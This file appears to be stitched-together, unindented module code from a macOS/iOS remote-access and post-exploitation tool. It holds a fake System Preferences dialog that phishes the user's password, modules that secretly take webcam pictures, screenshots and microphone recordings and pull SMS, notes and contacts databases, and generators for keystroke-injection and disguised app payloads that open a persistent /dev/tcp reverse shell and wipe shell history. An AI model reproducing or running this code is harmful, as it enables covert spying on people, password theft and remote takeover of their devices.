def run(self,session,cmd_data):
payload = """
tell application "Finder"
activate
set myprompt to "Type your password to allow System Preferences to make changes"
set ans to "Cancel"
repeat
try
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if mypass > "" then exit repeat
end try
end repeat
try
do shell script "echo " & quoted form of mypass
end try
end tell
"""
cmd_data.update({"cmd":"applescript","args":payload})
password = session.send_command(cmd_data).strip()
#display response
h.info_success("Response: "+password.decode())
return ""
def run(self, session, cmd_data):
if not cmd_data['args'] or (cmd_data['args'] != "front"
and cmd_data['args'] != "back"):
print self.usage
return
if cmd_data['args'] == "back":
cmd_data['args'] = False
else:
cmd_data['args'] = True
h.info_general("Taking picture...")
try:
response = json.loads(session.send_command(cmd_data))
if 'success' in response:
size = int(response["size"])
if cmd_data['args'] == False:
file_name = "back_{0}.jpg".format(int(time.time()))
else:
file_name = "front_{0}.jpg".format(int(time.time()))
data = session.sock_receive_data(size)
h.info_general("Saving {0}".format(file_name))
# save to file
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("Saved to downloads/{0}!".format(file_name))
else:
if 'error' in response:
h.info_error(response['error'])
else:
h.info_error("Unexpected error!")
except Exception as e:
print e
def run(self, session, cmd_data):
if not cmd_data['args']:
print self.usage
return
else:
paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
if len(paths) > 2:
print "Usage: upload <local_file> <remote_dir>"
return
local_dir = os.path.split(paths[0])[0]
local_file = os.path.split(paths[0])[1]
if len(paths) == 1:
remote_dir = "."
remote_file = local_file
else:
remote_dir = os.path.split(paths[1])[0]
if not remote_dir:
remote_dir = "."
remote_file = os.path.split(paths[1])[1]
if not remote_file:
remote_file = local_file
session.upload_file(paths[0], remote_dir, remote_file)
h.info_success("File successfully uploaded!")
def run(self,server):
while 1:
shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ")
while shell == "":
shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ")
persistence = raw_input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower()
if persistence == "y":
shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
break
else:
shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
break
shell_command += "history -wc;killall Terminal"
path = raw_input(h.info_general_raw("Output path: ")).strip(" ")
if path == "":
path = "payload.txt"
if os.path.isdir(path):
if os.path.exists(path):
if path[-1:] == "/":
payload_save_path = path + "payload.txt"
else:
payload_save_path = path + "/payload.txt"
else:
h.info_error("Local directory: "+path+": does not exist!")
exit
else:
direct = os.path.split(path)[0]
if direct == "":
direct = "."
else:
pass
if os.path.exists(direct):
if os.path.isdir(direct):
payload_save_path = path
else:
h.info_error("Error: "+direct+": not a directory!")
exit
else:
h.info_error("Local directory: "+direct+": does not exist!")
exit
payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """+shell_command+"""
DELAY 500
ENTER
DELAY 500"""
h.info_general("Saving to " + payload_save_path + "...")
f = open(payload_save_path,"w")
f.write(payload)
f.close()
h.info_success("Saved to " + payload_save_path + "!")
def run(self, server):
while 1:
shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ")
icon = raw_input(
h.info_general_raw("Application Icon: ")).strip(" ")
persistence = raw_input(
h.info_question_raw("Make Persistent? (y/n): ")).strip(
" ").lower()
if persistence == "y":
shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(
server.port) + " 0>&1); sleep 5; done & "
break
else:
shell_command = shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(server.port) + " 0>&1;"
break
path = raw_input(h.info_general_raw("Output File: ")).strip(" ")
w = os.environ['OLDPWD']
os.chdir(w)
if os.path.isdir(path):
if os.path.exists(path):
if path[:-1] == "/":
payload_save_path = path + "payload.app"
else:
payload_save_path = path + "/payload.app"
else:
h.info_error("Local directory: " + path + ": does not exist!")
exit
else:
direct = os.path.split(path)[0]
if os.path.exists(direct):
if os.path.isdir(direct):
payload_save_path = path + "/Contents/MacOS/payload.sh"
else:
h.info_error("Error: " + direct + ": not a directory!")
exit
else:
h.info_error("Local directory: " + direct +
": does not exist!")
exit
os.system("cp -r data/app/payload.app " + path + " > /dev/null")
os.system("mv " + icon + " " + path +
"/Contents/Resources/payload.icns > /dev/null")
payload = """\
#! /usr/bin/env bash
""" + shell_command
h.info_general("Saving to " + path + "...")
f = open(payload_save_path, "w")
f.write(payload)
f.close()
h.info_success("Saved to " + path + "!")
os.system("chmod +x " + path + "/Contents/MacOS/payload.sh")
g = os.environ['HOME']
os.chdir(g + "/mouse")
def run(self, session, cmd_data):
file_name = "sms.db"
h.info_general("Downloading {0}".format(file_name))
data = session.download_file('/var/mobile/Library/SMS/' + file_name)
if data:
# save to downloads
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("Saved to downloads/{0}!".format(file_name))
def run(self, session, cmd_data):
if not cmd_data['args']:
print self.usage
return
file_name = os.path.split(cmd_data['args'])[-1]
h.info_general("Downloading {0}...".format(file_name))
data = session.download_file(cmd_data['args'])
if data:
# save to downloads
h.info_general("Saving {0}...".format(file_name))
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("File saved to downloads/{0}!".format(file_name))
def run(self, session, cmd_data):
h.info_general("Taking screenshot...")
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error(result['error'])
return
elif 'size' in result:
size = int(result['size'])
data = session.sock_receive_data(size)
file_name = "screenshot_{0}.jpg".format(int(time.time()))
h.info_general("Saving {0}".format(file_name))
# save to file
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("Saved to downloads/{0}!".format(file_name))
def run(self, session, cmd_data):
h.info_general("Taking picture...")
response = json.loads(session.send_command(cmd_data))
try:
success = response["status"]
if success == 1:
size = int(response["size"])
file_name = "isight_{0}.jpg".format(int(time.time()))
data = session.sock_receive_data(size)
h.info_general("Saving {0}".format(file_name))
# save to file
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("Saved to downloads/{0}!".format(file_name))
except Exception as e:
print e
def run(self,session,cmd_data):
if len(cmd_data['args'].split()) < 2:
print self.usage
return
w = os.environ['OLDPWD']
os.chdir(w)
payload = """if [[ -d """+cmd_data['args'].split()[0]+""" ]]
then
echo 0
fi"""
dchk = session.send_command({"cmd":"","args":payload})
chk = session.send_command({"cmd":"stat","args":cmd_data['args'].split()[0]})
if chk[:4] != "stat":
if dchk == "0\n":
h.info_error("Error: "+cmd_data['args'].split()[0]+": not a file!")
else:
if os.path.isdir(cmd_data['args'].split()[1]):
if os.path.exists(cmd_data['args'].split()[1]):
rp = os.path.split(cmd_data['args'].split()[0])[1]
data = session.download_file(cmd_data['args'].split()[0])
h.info_general("Downloading {0}...".format(rp))
if data:
h.info_general("Saving to "+cmd_data['args']+"/{0}...".format(rp))
f = open(os.path.join(cmd_data['args'].split()[1],rp),'w')
f.write(data)
f.close()
if cmd_data['args'].split()[1][-1:] == "/":
h.info_success("Saved to "+cmd_data['args'].split()[1]+""+rp+"!")
else:
h.info_success("Saved to "+cmd_data['args'].split()[1]+"/"+rp+"!")
else:
h.info_error("Local directory: "+cmd_data['args'].split()[1]+": does not exist!")
else:
rp = os.path.split(cmd_data['args'].split()[1])[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
prr = os.path.split(cmd_data['args'].split()[1])[0]
rp = os.path.split(cmd_data['args'].split()[1])[1]
pr = os.path.split(cmd_data['args'].split()[0])[1]
data = session.download_file(cmd_data['args'].split()[0])
h.info_general("Downloading {0}...".format(pr))
if data:
h.info_general("Saving to {0}...".format(cmd_data['args'].split()[1]))
f = open(os.path.join(prr,rp),'w')
f.write(data)
f.close()
h.info_success("Saved to "+cmd_data['args'].split()[1]+"!")
else:
h.info_error("Error: "+rp+": not a directory!")
else:
h.info_error("Local directory: "+rp+": does not exists!")
else:
h.info_error("Remote file: "+cmd_data['args'].split()[0]+": does not exist!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
def run(self, session, cmd_data):
# #print output
if cmd_data["args"] == "stop":
# expect json
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error("Error: " + result['error'])
elif 'status' in result and result['status'] == 1:
# download file
data = session.download_file("/tmp/.avatmp")
# save to file
file_name = "mic{0}.caf".format(str(int(time.time())))
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("Saved to downloads/{0}!".format(file_name))
elif cmd_data["args"] == "start":
h.info_general(session.send_command(cmd_data))
else:
print "Usage: mic [start|stop]"
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print(self.usage)
return
w = os.environ['OLDPWD']
os.chdir(w)
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Getting notes...")
data = session.download_file(
'/var/mobile/Library/Notes/notes.sqlite')
if data:
f = open(os.path.join(dest, 'notes.sqlite'), 'wb')
f.write(data)
f.close()
if dest[-1] == "/":
h.info_general("Saving to " + dest + "notes.sqlite...")
time.sleep(1)
h.info_success("Saved to " + dest + "notes.sqlite!")
else:
h.info_general("Saving to " + dest +
"/notes.sqlite...")
time.sleep(1)
h.info_success("Saved to " + dest + "/notes.sqlite!")
else:
h.info_error("Failed to get notes!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Getting notes...")
data = session.download_file(
'/var/mobile/Library/Notes/notes.sqlite')
if data:
f = open(os.path.join(pr, rp), 'wb')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Failed to get notes!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print(self.usage)
return
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Getting contacts...")
data = session.download_file(
'/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
if data:
f = open(os.path.join(dest, 'contacts.sqlitedb'), 'wb')
f.write(data)
f.close()
if dest[-1] == "/":
h.info_general("Saving to " + dest +
"contacts.sqlitedb...")
time.sleep(1)
h.info_success("Saved to " + dest +
"contacts.sqlitedb!")
else:
h.info_general("Saving to " + dest +
"/contacts.sqlitedb...")
time.sleep(1)
h.info_success("Saved to " + dest +
"/contacts.sqlitedb!")
else:
h.info_error("Failed to get contacts!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Getting contacts...")
data = session.download_file(
'/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
if data:
f = open(os.path.join(pr, rp), 'wb')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Failed to get contacts!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print self.usage
return
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Taking picture...")
response = json.loads(session.send_command(cmd_data))
try:
success = response["status"]
if success == 1:
size = int(response["size"])
data = session.sock_receive_data(size)
f = open(os.path.join(dest, 'picture.jpg'), 'w')
f.write(data)
f.close()
except:
h.info_error("Failed to take picture!")
return
if dest[-1:] == "/":
h.info_general("Saving to " + dest + "picture.jpg...")
time.sleep(1)
h.info_success("Saved to " + dest + "picture.jpg!")
else:
h.info_general("Saving to " + dest + "/picture.jpg...")
time.sleep(1)
h.info_success("Saved to " + dest + "/picture.jpg!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Taking picture...")
response = json.loads(session.send_command(cmd_data))
try:
success = response["status"]
if success == 1:
size = int(response["size"])
data = session.sock_receive_data(size)
f = open(os.path.join(pr, rp), 'w')
f.write(data)
f.close()
except:
h.info_error("Failed to take picture!")
return
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print self.usage
return
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Taking screenshot...")
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error("Failed to take screenshot!")
return
if 'size' in result:
size = int(result['size'])
data = session.sock_receive_data(size)
f = open(os.path.join(dest, 'screenshot.jpg'), 'w')
f.write(data)
f.close()
if dest[-1:] == "/":
h.info_general("Saving to " + dest + "screenshot.jpg...")
time.sleep(1)
h.info_success("Saved to " + dest + "screenshot.jpg!")
else:
h.info_general("Saving to " + dest + "/screenshot.jpg...")
time.sleep(1)
h.info_success("Saved to " + dest + "/screenshot.jpg!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Taking screenshot...")
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error("Failed to take screenshot!")
return
if 'size' in result:
size = int(result['size'])
data = session.sock_receive_data(size)
f = open(os.path.join(pr, rp), 'w')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print self.usage
return
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Getting notes...")
data = session.download_file(
'/var/mobile/Library/Notes/notes.sqlite')
if data:
f = open(os.path.join(dest, 'notes.sqlite'), 'w')
f.write(data)
f.close()
if dest[-1:] == "/":
h.info_general("Saving to " + dest + "notes.sqlite...")
time.sleep(1)
h.info_success("Saved to " + dest + "notes.sqlite!")
else:
h.info_general("Saving to " + dest + "/notes.sqlite...")
time.sleep(1)
h.info_success("Saved to " + dest + "/notes.sqlite!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Getting notes...")
data = session.download_file(
'/var/mobile/Library/Notes/notes.sqlite')
if data:
f = open(os.path.join(pr, rp), 'w')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data):
if not cmd_data['args']:
print(self.usage)
return
else:
if cmd_data['args'].split()[0] == "start":
pass
else:
if len(cmd_data['args'].split()) < 2 or cmd_data['args'].split(
)[0] != "stop":
print(self.usage)
return
if cmd_data['args'].split()[0] == "stop":
w = os.environ['OLDPWD']
os.chdir(w)
dest = cmd_data['args'].split()[1]
cmd_data['args'] = "stop"
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Stopping record...")
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error("Failed to record mic!")
return
elif 'status' in result and result['status'] == 1:
data = session.download_file("/tmp/.avatmp")
f = open(os.path.join(dest, 'mic.caf'), 'wb')
f.write(data)
f.close()
if dest[-1] == "/":
h.info_general("Saving to " + dest + "mic.caf...")
time.sleep(1)
h.info_success("Saved to " + dest + "mic.caf!")
else:
h.info_general("Saving to " + dest + "/mic.caf...")
time.sleep(1)
h.info_success("Saved to " + dest + "/mic.caf!")
else:
h.info_error("Local directory: " + dest +
": does not exist!")
else:
rp = os.path.split(dest)[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Stopping record...")
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error("Failed to record mic!")
return
elif 'status' in result and result['status'] == 1:
data = session.download_file("/tmp/.avatmp")
f = open(os.path.join(pr, rp), 'wb')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp +
": does not exist!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
elif cmd_data['args'].split()[0] == "start":
cmd_data['args'] = "record"
h.info_general("Starting record...")
session.send_command(cmd_data)
def run(self, server):
while 1:
shell = input(h.info_general_raw("Target shell: ")).strip(" ")
while shell == "":
shell = input(h.info_general_raw("Target shell: ")).strip(" ")
icon = input(
h.info_general_raw("Application icon: ")).strip(" ")
while icon == "":
icon = input(
h.info_general_raw("Application icon: ")).strip(" ")
persistence = input(h.info_question_raw(
"Make persistent? (y/n): ")).strip(" ").lower()
if persistence == "y":
shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(
server.port) + " 0>&1); sleep 5; done & "
break
else:
shell_command = shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(server.port) + " 0>&1;"
break
shell_command += "history -wc;killall Terminal"
path = input(h.info_general_raw("Output path: ")).strip(" ")
if path == "":
path = "payload.app"
if os.path.isdir(path):
if os.path.exists(path):
if path[-1] == "/":
payload_save_path = path + "payload.app"
else:
payload_save_path = path + "/payload.app"
else:
h.info_error("Local directory: " + path + ": does not exist!")
exit
else:
direct = os.path.split(path)[0]
if direct == "":
direct = "."
else:
pass
if os.path.exists(direct):
if os.path.isdir(direct):
payload_save_path = path
else:
h.info_error("Error: " + direct + ": not a directory!")
exit
else:
h.info_error("Local directory: " + direct +
": does not exist!")
exit
h.info_general("Creating payload...")
os.system("cp -r data/app/payload.app " + path + " > /dev/null")
os.system("mv " + icon + " " + path +
"/Contents/Resources/payload.icns > /dev/null")
payload = """\
#! /usr/bin/env bash
""" + shell_command
h.info_general("Saving to " + path + "...")
f = open(payload_save_path, "w")
f.write(payload)
f.close()
h.info_success("Saved to " + path + "!")
os.system("chmod +x " + path + "/Contents/MacOS/payload.sh")
def run(self,session,cmd_data):
if len(cmd_data['args'].split()) < 2 or (cmd_data['args'].split()[0] != "front" and cmd_data['args'].split()[0] != "back"):
print(self.usage)
return
dest = cmd_data['args'].split()[1]
cmd_data['args'] = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
if cmd_data['args'] == "back":
cmd_data['args'] = False
else:
cmd_data['args'] = True
h.info_general("Taking picture...")
try:
response = json.loads(session.send_command(cmd_data))
if 'success' in response:
size = int(response["size"])
data = session.sock_receive_data(size)
f = open(os.path.join(dest,'picture.jpg'),'wb')
f.write(data)
f.close()
else:
if 'error' in response:
h.info_error("Failed to take picture!")
return
else:
h.info_error("Failed to take picture!")
return
except:
h.info_error("Failed to take picture!")
return
if dest[-1] == "/":
h.info_general("Saving to "+dest+"picture.jpg...")
time.sleep(1)
h.info_success("Saved to "+dest+"picture.jpg!")
else:
h.info_general("Saving to "+dest+"/picture.jpg...")
time.sleep(1)
h.info_success("Saved to "+dest+"/picture.jpg!")
else:
h.info_error("Local directory: "+dest+": does not exist!")
else:
rp = os.path.split(dest)[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
if cmd_data['args'] == "back":
cmd_data['args'] = False
else:
cmd_data['args'] = True
h.info_general("Taking picture...")
try:
response = json.loads(session.send_command(cmd_data))
if 'success' in response:
size = int(response["size"])
data = session.sock_receive_data(size)
f = open(os.path.join(pr,rp),'wb')
f.write(data)
f.close()
else:
if 'error' in response:
h.info_error("Failed to take picture!")
return
else:
h.info_error("Failed to take picture!")
return
except:
h.info_error("Failed to take picture!")
return
h.info_general("Saving to "+dest+"...")
time.sleep(1)
h.info_success("Saved to "+dest+"!")
else:
h.info_error("Error: "+rp+": not a directory!")
else:
h.info_error("Local directory: "+rp+": does not exist!")
def run(self, server):
while 1:
shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ")
persistence = raw_input(
h.info_question_raw("Make Persistent? (y/n): ")).strip(
" ").lower()
if persistence == "y":
shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(
server.port) + " 0>&1); sleep 5; done & "
break
else:
shell_command = shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(server.port) + " 0>&1;"
break
shell_command += "history -wc;killall Terminal"
path = raw_input(h.info_general_raw("Output File: ")).strip(" ")
w = os.environ['OLDPWD']
os.chdir(w)
if os.path.isdir(path):
if os.path.exists(path):
if path[:-1] == "/":
payload_save_path = path + "payload.ino"
else:
payload_save_path = path + "/payload.ino"
else:
h.info_error("Local directory: " + path + ": does not exist!")
exit
else:
direct = os.path.split(path)[0]
if os.path.exists(direct):
if os.path.isdir(direct):
payload_save_path = path
else:
h.info_error("Error: " + direct + ": not a directory!")
exit
else:
h.info_error("Local directory: " + direct +
": does not exist!")
exit
payload = """\
#include "Keyboard.h"
void typeKey(uint8_t key)
{
Keyboard.press(key);
delay(50);
Keyboard.release(key);
}
void setup()
{
Keyboard.begin();
delay(500);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(' ');
Keyboard.releaseAll();
delay(500);
Keyboard.print(F("terminal"));
delay(500);
typeKey(KEY_RETURN);
delay(500);
Keyboard.print(F(\"""" + shell_command + """\"));
delay(500);
typeKey(KEY_RETURN);
Keyboard.end();
}
void loop() {}"""
h.info_general("Saving to " + payload_save_path + "...")
f = open(payload_save_path, "w")
f.write(payload)
f.close()
h.info_success("Saved to " + payload_save_path + "!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
def run(self,server):
while 1:
shell = input(h.info_general_raw("Target shell: ")).strip(" ")
if shell == "":
shell = "sh"
persistence = input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower()
if persistence == "y":
shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
break
else:
shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
break
shell_command += "history -wc;killall Terminal"
path = input(h.info_general_raw("Output path: ")).strip(" ")
if path == "":
path = "payload.txt"
w = os.environ['OLDPWD']
os.chdir(w)
if os.path.isdir(path):
if os.path.exists(path):
if path[-1] == "/":
payload_save_path = path + "payload.txt"
else:
payload_save_path = path + "/payload.txt"
else:
h.info_error("Local directory: "+dest+": does not exist!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
input("Press enter to continue...").strip(" ")
os.system("touch .nopayload")
return
else:
direct = os.path.split(path)[0]
if direct == "":
direct = "."
else:
pass
if os.path.exists(direct):
if os.path.isdir(direct):
payload_save_path = path
else:
h.info_error("Error: "+direct+": not a directory!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
input("Press enter to continue...").strip(" ")
os.system("touch .nopayload")
return
else:
h.info_error("Local directory: "+direct+": does not exist!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
input("Press enter to continue...").strip(" ")
os.system("touch .nopayload")
return
h.info_general("Creating payload...")
payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """+shell_command+"""
DELAY 500
ENTER
DELAY 500"""
h.info_general("Saving to " + payload_save_path + "...")
f = open(payload_save_path,"w")
f.write(payload)
f.close()
h.info_success("Saved to " + payload_save_path + "!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
def run(self, session, cmd_data):
if not cmd_data['args']:
print self.usage
return
else:
paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
if len(paths) < 2:
print "Usage: upload <local_path> <remote_path>"
return
if len(paths) > 2:
print "Usage: upload <local_path> <remote_path>"
return
local_dir = os.path.split(paths[0])[0]
local_file = os.path.split(paths[0])[1]
remote_dir = os.path.split(paths[1])[0]
remote_file = os.path.split(paths[1])[1]
if os.path.exists(paths[0]):
if os.path.isdir(paths[0]):
h.info_error("Error: " + paths[0] + ": not a file!")
return
else:
pass
else:
h.info_error("Local file: " + paths[0] + ": does not exist!")
return
raw = paths[1]
payload = """if [[ -d """ + raw + """ ]]
then
echo 0
fi"""
dchk = session.send_command({"cmd": "", "args": payload})
chk = session.send_command({"cmd": "stat", "args": raw})
if dchk == "0\n":
if chk[:4] != "stat":
h.info_general("Uploading " + local_file + "...")
session.upload_file(paths[0], raw, local_file)
if raw[-1:] == "/":
h.info_general("Saving to " + raw + "" + local_file +
"...")
time.sleep(1)
h.info_success("Saved to " + raw + "" + local_file +
"...")
else:
h.info_general("Saving to " + raw + "/" + local_file +
"...")
time.sleep(1)
h.info_success("Saved to " + raw + "/" + local_file +
"...")
else:
h.info_error("Remote directory: " + raw +
": does not exist!")
else:
schk = session.send_command({
"cmd": "stat",
"args": remote_dir
})
if schk[:4] != "stat":
h.info_general("Uploading " + local_file + "...")
session.upload_file(paths[0], remote_dir, remote_file)
h.info_general("Saving to " + raw + "...")
time.sleep(1)
h.info_success("Saved to " + raw + "...")
else:
h.info_error("Remote directory: " + remote_dir +
": does not exist!")
def run(self, server):
while 1:
shell = input(h.info_general_raw("Target shell: ")).strip(" ")
if shell == "":
shell = "sh"
persistence = input(h.info_question_raw(
"Make persistent? (y/n): ")).strip(" ").lower()
if persistence == "y":
shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(
server.port) + " 0>&1); sleep 5; done & "
break
else:
shell_command = shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(server.port) + " 0>&1;"
break
shell_command += "history -wc;killall Terminal"
path = input(h.info_general_raw("Output path: ")).strip(" ")
if path == "":
path = "payload.ino"
if os.path.isdir(path):
if os.path.exists(path):
if path[-1] == "/":
payload_save_path = path + "payload.ino"
else:
payload_save_path = path + "/payload.ino"
else:
h.info_error("Local directory: " + path + ": does not exist!")
input("Press enter to continue...").strip(" ")
os.system("touch .nopayload")
return
else:
direct = os.path.split(path)[0]
if direct == "":
direct = "."
else:
pass
if os.path.exists(direct):
if os.path.isdir(direct):
payload_save_path = path
else:
h.info_error("Error: " + direct + ": not a directory!")
input("Press enter to continue...").strip(" ")
os.system("touch .nopayload")
return
else:
h.info_error("Local directory: " + direct +
": does not exist!")
input("Press enter to continue...").strip(" ")
os.system("touch .nopayload")
return
h.info_general("Creating payload...")
payload = """\
#include "Keyboard.h"
void typeKey(uint8_t key)
{
Keyboard.press(key);
delay(50);
Keyboard.release(key);
}
void setup()
{
Keyboard.begin();
delay(500);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(' ');
Keyboard.releaseAll();
delay(500);
Keyboard.print(F("terminal"));
delay(500);
typeKey(KEY_RETURN);
delay(500);
Keyboard.print(F(\"""" + shell_command + """\"));
delay(500);
typeKey(KEY_RETURN);
Keyboard.end();
}
void loop() {}"""
h.info_general("Saving to " + payload_save_path + "...")
f = open(payload_save_path, "w")
f.write(payload)
f.close()
h.info_success("Saved to " + payload_save_path + "!")
